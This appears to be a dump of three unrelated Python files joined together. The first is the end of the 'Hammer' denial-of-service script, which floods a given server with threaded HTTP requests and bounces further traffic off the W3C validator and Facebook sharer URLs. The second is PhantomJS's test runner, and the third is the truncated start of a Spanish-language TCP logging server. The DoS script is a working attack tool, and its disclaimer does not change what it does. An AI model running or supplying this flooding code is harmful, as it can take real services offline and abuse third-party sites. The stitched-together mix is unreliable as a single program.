uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m Hammer Dos Script v.1 http://www.canyalcin.com/
It is the end user's responsibility to obey all applicable laws.
It is just for server testing script. Your ip is visible. \n
usage : python3 hammer.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
run-tests.py
|
#!/usr/bin/env python
import argparse
import collections
import errno
import glob
import imp
import os
import posixpath
import re
import shlex
import SimpleHTTPServer
import socket
import SocketServer
import ssl
import string
import cStringIO as StringIO
import subprocess
import sys
import threading
import time
import traceback
import urllib
# All files matching one of these glob patterns will be run as tests.
TESTS = [
'basics/*.js',
'module/*/*.js',
'standards/*/*.js',
'regression/*.js',
]
TIMEOUT = 7 # Maximum duration of PhantomJS execution (in seconds).
# This is a backstop; testharness.js imposes a shorter
# timeout. Both can be increased if necessary.
#
# Utilities
#
# FIXME: assumes ANSI/VT100 escape sequences
# properly this should use curses, but that's an awful lot of work
# One of colors 30 ("black" -- usually a dark gray) and 37 ("white" --
# usually a very light gray) will almost certainly be illegible
# against the terminal background, so we provide neither.
# The colorization mode is global because so is sys.stdout.
_COLOR_NONE = {
"_": "", "^": "",
"r": "", "R": "",
"g": "", "G": "",
"y": "", "Y": "",
"b": "", "B": "",
"m": "", "M": "",
"c": "", "C": "",
}
_COLOR_ON = {
"_": "\033[0m", "^": "\033[1m",
"r": "\033[31m", "R": "\033[1;31m",
"g": "\033[32m", "G": "\033[1;32m",
"y": "\033[33m", "Y": "\033[1;33m",
"b": "\033[34m", "B": "\033[1;34m",
"m": "\033[35m", "M": "\033[1;35m",
"c": "\033[36m", "C": "\033[1;36m",
}
_COLOR_BOLD = {
"_": "\033[0m", "^": "\033[1m",
"r": "\033[0m", "R": "\033[1m",
"g": "\033[0m", "G": "\033[1m",
"y": "\033[0m", "Y": "\033[1m",
"b": "\033[0m", "B": "\033[1m",
"m": "\033[0m", "M": "\033[1m",
"c": "\033[0m", "C": "\033[1m",
}
_COLORS = None
def activate_colorization(options):
global _COLORS
if options.color == "always":
_COLORS = _COLOR_ON
elif options.color == "never":
_COLORS = _COLOR_NONE
else:
if sys.stdout.isatty():
try:
n = int(subprocess.check_output(["tput", "colors"]))
if n >= 8:
_COLORS = _COLOR_ON
else:
_COLORS = _COLOR_BOLD
except subprocess.CalledProcessError:
_COLORS = _COLOR_NONE
else:
_COLORS = _COLOR_NONE
def colorize(color, message):
return _COLORS[color] + message + _COLORS["_"]
# create_default_context and SSLContext were only added in 2.7.9,
# which is newer than the python2 that ships with OSX :-(
# The fallback tries to mimic what create_default_context(CLIENT_AUTH)
# does. Security obviously isn't important in itself for a test
# server, but making sure the PJS client can talk to a server
# configured according to modern TLS best practices _is_ important.
# Unfortunately, there is no way to set things like OP_NO_SSL2 or
# OP_CIPHER_SERVER_PREFERENCE prior to 2.7.9.
CIPHERLIST_2_7_9 = (
'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:'
'!eNULL:!MD5:!DSS:!RC4'
)
def wrap_socket_ssl(sock, base_path):
crtfile = os.path.join(base_path, 'certs/https-snakeoil.crt')
keyfile = os.path.join(base_path, 'certs/https-snakeoil.key')
try:
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ctx.load_cert_chain(crtfile, keyfile)
return ctx.wrap_socket(sock, server_side=True)
except AttributeError:
return ssl.wrap_socket(sock,
keyfile=keyfile,
certfile=crtfile,
server_side=True,
ciphers=CIPHERLIST_2_7_9)
# This should be in the standard library somewhere, but as far as I
# can tell, it isn't.
class ResponseHookImporter(object):
def __init__(self, www_path):
# All Python response hooks, no matter how deep below www_path,
# are treated as direct children of the fake "test_www" package.
if 'test_www' not in sys.modules:
imp.load_source('test_www', www_path + '/__init__.py')
self.tr = string.maketrans('-./%', '____')
def __call__(self, path):
modname = 'test_www.' + path.translate(self.tr)
try:
return sys.modules[modname]
except KeyError:
return imp.load_source(modname, path)
# This should also be in the standard library somewhere, and
# definitely isn't.
#
# FIXME: This currently involves *three* threads for every process,
# and a fourth if the process takes input. (On Unix, clever use of
# select() might be able to get that down to one, but zero is Hard.
# On Windows, we're hosed. 3.4's asyncio module would make everything
# better, but 3.4 is its own can of worms.)
try:
devnull = subprocess.DEVNULL
except:
devnull = os.open(os.devnull, os.O_RDONLY)
def do_call_subprocess(command, verbose, stdin_data, timeout):
def read_thread(linebuf, fp):
while True:
line = fp.readline().rstrip()
if not line: break # EOF
line = line.rstrip()
if line:
linebuf.append(line)
if verbose >= 3:
sys.stdout.write(line + '\n')
def write_thread(data, fp):
fp.writelines(data)
fp.close()
def reap_thread(proc, timed_out):
if proc.returncode is None:
proc.terminate()
timed_out[0] = True
class DummyThread:
def start(self): pass
def join(self): pass
if stdin_data:
stdin = subprocess.PIPE
else:
stdin = devnull
proc = subprocess.Popen(command,
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if stdin_data:
sithrd = threading.Thread(target=write_thread,
args=(stdin_data, proc.stdin))
else:
sithrd = DummyThread()
stdout = []
stderr = []
timed_out = [False]
sothrd = threading.Thread(target=read_thread, args=(stdout, proc.stdout))
sethrd = threading.Thread(target=read_thread, args=(stderr, proc.stderr))
rpthrd = threading.Timer(timeout, reap_thread, args=(proc, timed_out))
sithrd.start()
sothrd.start()
sethrd.start()
rpthrd.start()
proc.wait()
if not timed_out[0]: rpthrd.cancel()
sithrd.join()
sothrd.join()
sethrd.join()
rpthrd.join()
if timed_out[0]:
stderr.append("TIMEOUT: Process terminated after {} seconds."
.format(timeout))
if verbose >= 3:
sys.stdout.write(stderr[-1] + "\n")
rc = proc.returncode
if verbose >= 3:
if rc < 0:
sys.stdout.write("## killed by signal {}\n".format(-rc))
else:
sys.stdout.write("## exit {}\n".format(rc))
return proc.returncode, stdout, stderr
#
# HTTP/HTTPS server, presented on localhost to the tests
#
class FileHandler(SimpleHTTPServer.SimpleHTTPRequestHandler, object):
def __init__(self, *args, **kwargs):
self._cached_untranslated_path = None
self._cached_translated_path = None
self.postdata = None
super(FileHandler, self).__init__(*args, **kwargs)
# silent, do not pollute stdout nor stderr.
def log_message(self, format, *args):
return
# accept POSTs, read the postdata and stash it in an instance variable,
# then forward to do_GET; handle_request hooks can vary their behavior
# based on the presence of postdata and/or the command verb.
def do_POST(self):
try:
ln = int(self.headers.get('content-length'))
except TypeError, ValueError:
self.send_response(400, 'Bad Request')
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write("No or invalid Content-Length in POST (%r)"
% self.headers.get('content-length'))
return
self.postdata = self.rfile.read(ln)
self.do_GET()
# allow provision of a .py file that will be interpreted to
# produce the response.
def send_head(self):
path = self.translate_path(self.path)
# do not allow direct references to .py(c) files,
# or indirect references to __init__.py
if (path.endswith('.py') or path.endswith('.pyc') or
path.endswith('__init__')):
self.send_error(404, 'File not found')
return None
if os.path.exists(path):
return super(FileHandler, self).send_head()
py = path + '.py'
if os.path.exists(py):
try:
mod = self.get_response_hook(py)
return mod.handle_request(self)
except:
self.send_error(500, 'Internal Server Error in '+py)
raise
self.send_error(404, 'File not found')
return None
# modified version of SimpleHTTPRequestHandler's translate_path
# to resolve the URL relative to the www/ directory
# (e.g. /foo -> test/www/foo)
def translate_path(self, path):
# Cache for efficiency, since our send_head calls this and
# then, in the normal case, the parent class's send_head
# immediately calls it again.
if (self._cached_translated_path is not None and
self._cached_untranslated_path == path):
return self._cached_translated_path
orig_path = path
# Strip query string and/or fragment, if present.
x = path.find('?')
if x != -1: path = path[:x]
x = path.find('#')
if x != -1: path = path[:x]
# Ensure consistent encoding of special characters, then
# lowercase everything so that the tests behave consistently
# whether or not the local filesystem is case-sensitive.
path = urllib.quote(urllib.unquote(path)).lower()
# Prevent access to files outside www/.
# At this point we want specifically POSIX-like treatment of 'path'
# because it is still a URL component and not a filesystem path.
# SimpleHTTPRequestHandler.send_head() expects us to preserve the
# distinction between paths with and without a trailing slash, but
# posixpath.normpath() discards that distinction.
trailing_slash = path.endswith('/')
path = posixpath.normpath(path)
while path.startswith('/'):
path = path[1:]
while path.startswith('../'):
path = path[3:]
# Now resolve the normalized, clamped path relative to the www/
# directory, according to local OS conventions.
path = os.path.normpath(os.path.join(self.www_path, *path.split('/')))
if trailing_slash:
# it must be a '/' even on Windows
path += '/'
self._cached_untranslated_path = orig_path
self._cached_translated_path = path
return path
class TCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# This is how you are officially supposed to set SO_REUSEADDR per
# https://docs.python.org/2/library/socketserver.html#SocketServer.BaseServer.allow_reuse_address
allow_reuse_address = True
def __init__(self, use_ssl, handler, base_path, signal_error):
SocketServer.TCPServer.__init__(self, ('localhost', 0), handler)
if use_ssl:
self.socket = wrap_socket_ssl(self.socket, base_path)
self._signal_error = signal_error
def handle_error(self, request, client_address):
# Ignore errors which can occur naturally if the client
# disconnects in the middle of a request. EPIPE and
# ECONNRESET *should* be the only such error codes
# (according to the OSX manpage for send()).
_, exval, _ = sys.exc_info()
if getattr(exval, 'errno', None) in (errno.EPIPE, errno.ECONNRESET):
return
# Otherwise, report the error to the test runner.
self._signal_error(sys.exc_info())
class HTTPTestServer(object):
def __init__(self, base_path, signal_error, verbose):
self.httpd = None
self.httpsd = None
self.base_path = base_path
self.www_path = os.path.join(base_path, 'www')
self.signal_error = signal_error
self.verbose = verbose
def __enter__(self):
handler = FileHandler
handler.extensions_map.update({
'.htm': 'text/html',
'.html': 'text/html',
'.css': 'text/css',
'.js': 'application/javascript',
'.json': 'application/json'
})
handler.www_path = self.www_path
handler.get_response_hook = ResponseHookImporter(self.www_path)
self.httpd = TCPServer(False, handler,
self.base_path, self.signal_error)
os.environ['TEST_HTTP_BASE'] = \
'http://localhost:{}/'.format(self.httpd.server_address[1])
httpd_thread = threading.Thread(target=self.httpd.serve_forever)
httpd_thread.daemon = True
httpd_thread.start()
if self.verbose >= 3:
sys.stdout.write("## HTTP server at {}\n".format(
os.environ['TEST_HTTP_BASE']))
self.httpsd = TCPServer(True, handler,
self.base_path, self.signal_error)
os.environ['TEST_HTTPS_BASE'] = \
'https://localhost:{}/'.format(self.httpsd.server_address[1])
httpsd_thread = threading.Thread(target=self.httpsd.serve_forever)
httpsd_thread.daemon = True
httpsd_thread.start()
if self.verbose >= 3:
sys.stdout.write("## HTTPS server at {}\n".format(
os.environ['TEST_HTTPS_BASE']))
return self
def __exit__(self, *dontcare):
self.httpd.shutdown()
del os.environ['TEST_HTTP_BASE']
self.httpsd.shutdown()
del os.environ['TEST_HTTPS_BASE']
#
# Running tests and interpreting their results
#
class TestDetailCode(collections.namedtuple("TestDetailCode", (
"idx", "color", "short_label", "label", "long_label"))):
def __index__(self): return self.idx
def __hash__(self): return self.idx
def __eq__(self, other): return self.idx == other.idx
def __ne__(self, other): return self.idx != other.idx
class T(object):
PASS = TestDetailCode(0, "g", ".", "pass", "passed")
FAIL = TestDetailCode(1, "R", "F", "FAIL", "failed")
XFAIL = TestDetailCode(2, "y", "f", "xfail", "failed as expected")
XPASS = TestDetailCode(3, "Y", "P", "XPASS", "passed unexpectedly")
ERROR = TestDetailCode(4, "R", "E", "ERROR", "had errors")
SKIP = TestDetailCode(5, "m", "s", "skip", "skipped")
MAX = 6
class TestDetail(object):
"""Holds one block of details about a test that failed."""
# types of details:
def __init__(self, message, test_id, detail_type):
if not isinstance(message, list):
message = [message]
self.message = [line.rstrip()
for chunk in message
for line in chunk.split("\n")]
self.dtype = detail_type
self.test_id = test_id
def report(self, fp):
col, label = self.dtype.color, self.dtype.label
if self.test_id:
fp.write("{:>5}: {}\n".format(colorize(col, label),
self.test_id))
lo = 0
else:
fp.write("{:>5}: {}\n".format(colorize(col, label),
self.message[0]))
lo = 1
for line in self.message[lo:]:
fp.write(" {}\n".format(colorize("b", line)))
class TestGroup(object):
"""Holds the result of one group of tests (that is, one .js file),
parsed from the output of run_phantomjs (see below).
Subclasses specify what the output means.
A test with zero details is considered to be successful.
"""
def __init__(self, name):
self.name = name
self.n = [0]*T.MAX
self.details = []
def parse(self, rc, out, err):
raise NotImplementedError
def _add_d(self, message, test_id, dtype):
self.n[dtype] += 1
self.details.append(TestDetail(message, test_id, dtype))
def add_pass (self, m, t): self._add_d(m, t, T.PASS)
def add_fail (self, m, t): self._add_d(m, t, T.FAIL)
def add_xpass(self, m, t): self._add_d(m, t, T.XPASS)
def add_xfail(self, m, t): self._add_d(m, t, T.XFAIL)
def add_error(self, m, t): self._add_d(m, t, T.ERROR)
def add_skip (self, m, t): self._add_d(m, t, T.SKIP)
def default_interpret_exit_code(self, rc):
if rc == 0:
if not self.is_successful() and not self.n[T.ERROR]:
self.add_error([],
"PhantomJS exited successfully when test failed")
# Exit code -15 indicates a timeout.
elif rc == 1 or rc == -15:
if self.is_successful():
self.add_error([], "PhantomJS exited unsuccessfully")
elif rc >= 2:
self.add_error([], "PhantomJS exited with code {}".format(rc))
else:
self.add_error([], "PhantomJS killed by signal {}".format(-rc))
def is_successful(self):
return self.n[T.FAIL] + self.n[T.XPASS] + self.n[T.ERROR] == 0
def worst_code(self):
# worst-to-best ordering
for code in (T.ERROR, T.FAIL, T.XPASS, T.SKIP, T.XFAIL, T.PASS):
if self.n[code] > 0:
return code
return T.PASS
def one_char_summary(self, fp):
code = self.worst_code()
fp.write(colorize(code.color, code.short_label))
fp.flush()
def line_summary(self, fp):
code = self.worst_code()
fp.write("{}: {}\n".format(colorize("^", self.name),
colorize(code.color, code.label)))
def report(self, fp, show_all):
self.line_summary(fp)
need_blank_line = False
for detail in self.details:
if show_all or detail.dtype not in (T.PASS, T.XFAIL, T.SKIP):
detail.report(fp)
need_blank_line = True
if need_blank_line:
fp.write("\n")
def report_for_verbose_level(self, fp, verbose):
if verbose == 0:
self.one_char_summary(sys.stdout)
elif verbose == 1:
self.report(sys.stdout, False)
else:
self.report(sys.stdout, True)
class ExpectTestGroup(TestGroup):
"""Test group whose output must be exactly as specified by directives
in the file. This is how you test for an _unsuccessful_ exit code,
or for output appearing on a specific one of stdout/stderr.
"""
def __init__(self, name, rc_exp, stdout_exp, stderr_exp,
rc_xfail, stdout_xfail, stderr_xfail):
TestGroup.__init__(self, name)
if rc_exp is None: rc_exp = 0
self.rc_exp = rc_exp
self.stdout_exp = stdout_exp
self.stderr_exp = stderr_exp
self.rc_xfail = rc_xfail
self.stdout_xfail = stdout_xfail
self.stderr_xfail = stderr_xfail
def parse(self, rc, out, err):
self.parse_output("stdout", self.stdout_exp, out, self.stdout_xfail)
self.parse_output("stderr", self.stderr_exp, err, self.stderr_xfail)
exit_msg = ["expected exit code {} got {}"
.format(self.rc_exp, rc)]
if rc != self.rc_exp:
exit_desc = "did not exit as expected"
if self.rc_xfail:
self.add_xfail(exit_msg, exit_desc)
else:
self.add_fail(exit_msg, exit_desc)
else:
exit_desc = "exited as expected"
if self.rc_xfail:
self.add_xpass(exit_msg, exit_desc)
else:
self.add_pass(exit_msg, exit_desc)
def parse_output(self, what, exp, got, xfail):
diff = []
le = len(exp)
lg = len(got)
for i in range(max(le, lg)):
e = ""
g = ""
if i < le: e = exp[i]
if i < lg: g = got[i]
if e != g:
diff.extend(("{}: line {} not as expected".format(what, i+1),
"-" + repr(e)[1:-1],
"+" + repr(g)[1:-1]))
if diff:
desc = what + " not as expected"
if xfail:
self.add_xfail(diff, desc)
else:
self.add_fail(diff, desc)
else:
desc = what + " as expected"
if xfail:
self.add_xpass(diff, desc)
else:
self.add_pass(diff, desc)
class TAPTestGroup(TestGroup):
"""Test group whose output is interpreted according to a variant of the
Test Anything Protocol (http://testanything.org/tap-specification.html).
Relative to that specification, these are the changes:
* Plan-at-the-end, explanations for directives, and "Bail out!"
are not supported. ("1..0 # SKIP: explanation" *is* supported.)
* "Anything else" lines are an error.
* Repeating a test point number, or using one outside the plan
range, is an error (this is unspecified in TAP proper).
* Diagnostic lines beginning with # are taken as additional
information about the *next* test point. Diagnostic lines
beginning with ## are ignored.
* Directives are case sensitive.
"""
diag_r = re.compile(r"^#(#*)\s*(.*)$")
plan_r = re.compile(r"^1..(\d+)(?:\s*\#\s*SKIP(?::\s*(.*)))?$")
test_r = re.compile(r"^(not ok|ok)\s*"
r"([0-9]+)?\s*"
r"([^#]*)(?:# (TODO|SKIP))?$")
def parse(self, rc, out, err):
self.parse_tap(out, err)
self.default_interpret_exit_code(rc)
def parse_tap(self, out, err):
points_already_used = set()
messages = []
# Look for the plan.
# Diagnostic lines are allowed to appear above the plan, but not
# test lines.
for i in range(len(out)):
line = out[i]
m = self.diag_r.match(line)
if m:
if not m.group(1):
messages.append(m.group(2))
continue
m = self.plan_r.match(line)
if m:
break
messages.insert(0, line)
self.add_error(messages, "Plan line not interpretable")
if i + 1 < len(out):
self.add_skip(out[(i+1):], "All further output ignored")
return
else:
self.add_error(messages, "No plan line detected in output")
return
max_point = int(m.group(1))
if max_point == 0:
if any(msg.startswith("ERROR:") for msg in messages):
self.add_error(messages, m.group(2) or "Test group skipped")
else:
self.add_skip(messages, m.group(2) or "Test group skipped")
if i + 1 < len(out):
self.add_skip(out[(i+1):], "All further output ignored")
return
prev_point = 0
for i in range(i+1, len(out)):
line = out[i]
m = self.diag_r.match(line)
if m:
if not m.group(1):
messages.append(m.group(2))
continue
m = self.test_r.match(line)
if m:
status = m.group(1)
point = m.group(2)
desc = m.group(3)
dirv = m.group(4)
if point:
point = int(point)
else:
point = prev_point + 1
if point in points_already_used:
# A reused test point is an error.
self.add_error(messages, desc + " [test point repeated]")
else:
points_already_used.add(point)
# A point above the plan limit is an automatic *fail*.
# The test suite relies on this in testing exit().
if point > max_point:
status = "not ok"
if status == "ok":
if not dirv:
self.add_pass(messages, desc)
elif dirv == "TODO":
self.add_xpass(messages, desc)
elif dirv == "SKIP":
self.add_skip(messages, desc)
else:
self.add_error(messages, desc +
" [ok, with invalid directive "+dirv+"]")
else:
if not dirv:
self.add_fail(messages, desc)
elif dirv == "TODO":
self.add_xfail(messages, desc)
else:
self.add_error(messages, desc +
" [not ok, with invalid directive "+dirv+"]")
del messages[:]
prev_point = point
else:
self.add_error([line], "neither a test nor a diagnostic")
# Any output on stderr is an error, with one exception: the timeout
# message added by record_process_output, which is treated as an
# unnumbered "not ok".
if err:
if len(err) == 1 and err[0].startswith("TIMEOUT: "):
points_already_used.add(prev_point + 1)
self.add_fail(messages, err[0][len("TIMEOUT: "):])
else:
self.add_error(err, "Unexpected output on stderr")
# Any missing test points are fails.
for pt in range(1, max_point+1):
if pt not in points_already_used:
self.add_fail([], "test {} did not report status".format(pt))
class TestRunner(object):
def __init__(self, base_path, phantomjs_exe, options):
self.base_path = base_path
self.cert_path = os.path.join(base_path, 'certs')
self.harness = os.path.join(base_path, 'testharness.js')
self.phantomjs_exe = phantomjs_exe
self.verbose = options.verbose
self.debugger = options.debugger
self.to_run = options.to_run
self.server_errs = []
def signal_server_error(self, exc_info):
self.server_errs.append(exc_info)
def get_base_command(self, debugger):
if debugger is None:
return [self.phantomjs_exe]
elif debugger == "gdb":
return ["gdb", "--args", self.phantomjs_exe]
elif debugger == "lldb":
return ["lldb", "--", self.phantomjs_exe]
elif debugger == "valgrind":
return ["valgrind", self.phantomjs_exe]
else:
raise RuntimeError("Don't know how to invoke " + self.debugger)
def run_phantomjs(self, script,
script_args=[], pjs_args=[], stdin_data=[],
timeout=TIMEOUT, silent=False):
verbose = self.verbose
debugger = self.debugger
if silent:
verbose = False
debugger = None
output = []
command = self.get_base_command(debugger)
command.extend(pjs_args)
command.append(script)
if verbose:
command.append('--verbose={}'.format(verbose))
command.extend(script_args)
if verbose >= 3:
sys.stdout.write("## running {}\n".format(" ".join(command)))
if debugger:
# FIXME: input-feed mode doesn't work with a debugger,
# because how do you tell the debugger that the *debuggee*
# needs to read from a pipe?
subprocess.call(command)
return 0, [], []
else:
return do_call_subprocess(command, verbose, stdin_data, timeout)
def run_test(self, script, name):
script_args = []
pjs_args = []
use_harness = True
use_snakeoil = True
stdin_data = []
stdout_exp = []
stderr_exp = []
rc_exp = None
stdout_xfail = False
stderr_xfail = False
rc_xfail = False
timeout = TIMEOUT
def require_args(what, i, tokens):
if i+1 == len(tokens):
raise ValueError(what + "directive requires an argument")
if self.verbose >= 3:
sys.stdout.write(colorize("^", name) + ":\n")
# Parse any directives at the top of the script.
try:
with open(script, "rt") as s:
for line in s:
if not line.startswith("//!"):
break
tokens = shlex.split(line[3:], comments=True)
skip = False
for i in range(len(tokens)):
if skip:
skip = False
continue
tok = tokens[i]
if tok == "no-harness":
use_harness = False
elif tok == "no-snakeoil":
use_snakeoil = False
elif tok == "expect-exit-fails":
rc_xfail = True
elif tok == "expect-stdout-fails":
stdout_xfail = True
elif tok == "expect-stderr-fails":
stderr_xfail = True
elif tok == "timeout:":
require_args(tok, i, tokens)
timeout = float(tokens[i+1])
if timeout <= 0:
raise ValueError("timeout must be positive")
skip = True
elif tok == "expect-exit:":
require_args(tok, i, tokens)
rc_exp = int(tokens[i+1])
skip = True
elif tok == "phantomjs:":
require_args(tok, i, tokens)
pjs_args.extend(tokens[(i+1):])
break
elif tok == "script:":
require_args(tok, i, tokens)
script_args.extend(tokens[(i+1):])
break
elif tok == "stdin:":
require_args(tok, i, tokens)
stdin_data.append(" ".join(tokens[(i+1):]) + "\n")
break
elif tok == "expect-stdout:":
require_args(tok, i, tokens)
stdout_exp.append(" ".join(tokens[(i+1):]))
break
elif tok == "expect-stderr:":
require_args(tok, i, tokens)
stderr_exp.append(" ".join(tokens[(i+1):]))
break
else:
raise ValueError("unrecognized directive: " + tok)
except Exception as e:
grp = TestGroup(name)
if hasattr(e, 'strerror') and hasattr(e, 'filename'):
grp.add_error([], '{} ({}): {}\n'
.format(name, e.filename, e.strerror))
else:
grp.add_error([], '{} ({}): {}\n'
.format(name, script, str(e)))
return grp
if use_harness:
script_args.insert(0, script)
script = self.harness
if use_snakeoil:
pjs_args.insert(0, '--ssl-certificates-path=' + self.cert_path)
rc, out, err = self.run_phantomjs(script, script_args, pjs_args,
stdin_data, timeout)
if rc_exp or stdout_exp or stderr_exp:
grp = ExpectTestGroup(name,
rc_exp, stdout_exp, stderr_exp,
rc_xfail, stdout_xfail, stderr_xfail)
else:
grp = TAPTestGroup(name)
grp.parse(rc, out, err)
return grp
def run_tests(self):
start = time.time()
base = self.base_path
nlen = len(base) + 1
results = []
for test_glob in TESTS:
test_glob = os.path.join(base, test_glob)
for test_script in sorted(glob.glob(test_glob)):
tname = os.path.splitext(test_script)[0][nlen:]
if self.to_run:
for to_run in self.to_run:
if to_run in tname:
break
else:
continue
any_executed = True
grp = self.run_test(test_script, tname)
grp.report_for_verbose_level(sys.stdout, self.verbose)
results.append(grp)
grp = TestGroup("HTTP server errors")
for ty, val, tb in self.server_errs:
grp.add_error(traceback.format_tb(tb, 5),
traceback.format_exception_only(ty, val)[-1])
grp.report_for_verbose_level(sys.stdout, self.verbose)
results.append(grp)
sys.stdout.write("\n")
return self.report(results, time.time() - start)
def report(self, results, elapsed):
# There is always one test group, for the HTTP server errors.
if len(results) == 1:
sys.stderr.write("No tests selected for execution.\n")
return 1
n = [0] * T.MAX
for grp in results:
if self.verbose == 0 and not grp.is_successful():
grp.report(sys.stdout, False)
for i, x in enumerate(grp.n): n[i] += x
sys.stdout.write("{:6.3f}s elapsed\n".format(elapsed))
for s in (T.PASS, T.FAIL, T.XPASS, T.XFAIL, T.ERROR, T.SKIP):
if n[s]:
sys.stdout.write(" {:>4} {}\n".format(n[s], s.long_label))
if n[T.FAIL] == 0 and n[T.XPASS] == 0 and n[T.ERROR] == 0:
return 0
else:
return 1
def init():
base_path = os.path.normpath(os.path.dirname(os.path.abspath(__file__)))
phantomjs_exe = os.path.normpath(base_path + '/../bin/phantomjs')
if sys.platform in ('win32', 'cygwin'):
phantomjs_exe += '.exe'
if not os.path.isfile(phantomjs_exe):
sys.stdout.write("{} is unavailable, cannot run tests.\n"
.format(phantomjs_exe))
sys.exit(1)
parser = argparse.ArgumentParser(description='Run PhantomJS tests.')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='Increase verbosity of logs (repeat for more)')
parser.add_argument('to_run', nargs='*', metavar='test',
help='tests to run (default: all of them)')
parser.add_argument('--debugger', default=None,
help="Run PhantomJS under DEBUGGER")
parser.add_argument('--color', metavar="WHEN", default='auto',
choices=['always', 'never', 'auto'],
help="colorize the output; can be 'always',"
" 'never', or 'auto' (the default)")
options = parser.parse_args()
activate_colorization(options)
runner = TestRunner(base_path, phantomjs_exe, options)
if options.verbose:
rc, ver, err = runner.run_phantomjs('--version', silent=True)
if rc != 0 or len(ver) != 1 or len(err) != 0:
sys.stdout.write(colorize("R", "FATAL")+": Version check failed\n")
for l in ver:
sys.stdout.write(colorize("b", "## " + l) + "\n")
for l in err:
sys.stdout.write(colorize("b", "## " + l) + "\n")
sys.stdout.write(colorize("b", "## exit {}".format(rc)) + "\n")
sys.exit(1)
sys.stdout.write(colorize("b", "## Testing PhantomJS "+ver[0])+"\n")
# Run all the tests in Chatham Islands Standard Time, UTC+12:45.
# This timezone is deliberately chosen to be unusual: it's not a
# whole number of hours offset from UTC *and* it's more than twelve
# hours offset from UTC.
#
# The Chatham Islands do observe daylight savings, but we don't
# implement that because testsuite issues only reproducible on two
# particular days out of the year are too much tsuris.
#
# Note that the offset in a TZ value is the negative of the way it's
# usually written, e.g. UTC+1 would be xxx-1:00.
os.environ["TZ"] = "CIST-12:45:00"
return runner
def main():
runner = init()
try:
with HTTPTestServer(runner.base_path,
runner.signal_server_error,
runner.verbose):
sys.exit(runner.run_tests())
except Exception:
trace = traceback.format_exc(5).split("\n")
# there will be a blank line at the end of 'trace'
sys.stdout.write(colorize("R", "FATAL") + ": " + trace[-2] + "\n")
for line in trace[:-2]:
sys.stdout.write(colorize("b", "## " + line) + "\n")
sys.exit(1)
except KeyboardInterrupt:
sys.exit(2)
main()
|
sserver.py
|
import socket
import threading
import socketserver
import datetime
import sys
import errno
global_lock = threading.Lock()
filename = "registro_clientes.txt"
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
self.obtiene_y_registra_datos()
def obtiene_y_registra_datos(self):
print("[!] Server invocado")
continua = True
buffer = ''
while continua:
try:
data = str(self.request.recv(1024), 'utf-8')
buffer += data
if '\n' in buffer and len(buffer) > 1:
continua = False
except socket.error as e:
err = e.args[0]
if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
sleep(1)
continue
else:
sys.exit(1)
try:
lista_registros = buffer.split(",")
data = data.split(",")
data = data[1:]
tmp = ""
for elemento in data:
tmp += " " + elemento
data = tmp
if lista_registros[0] == password:
global_lock.acquire()
with open(filename, "a") as f:
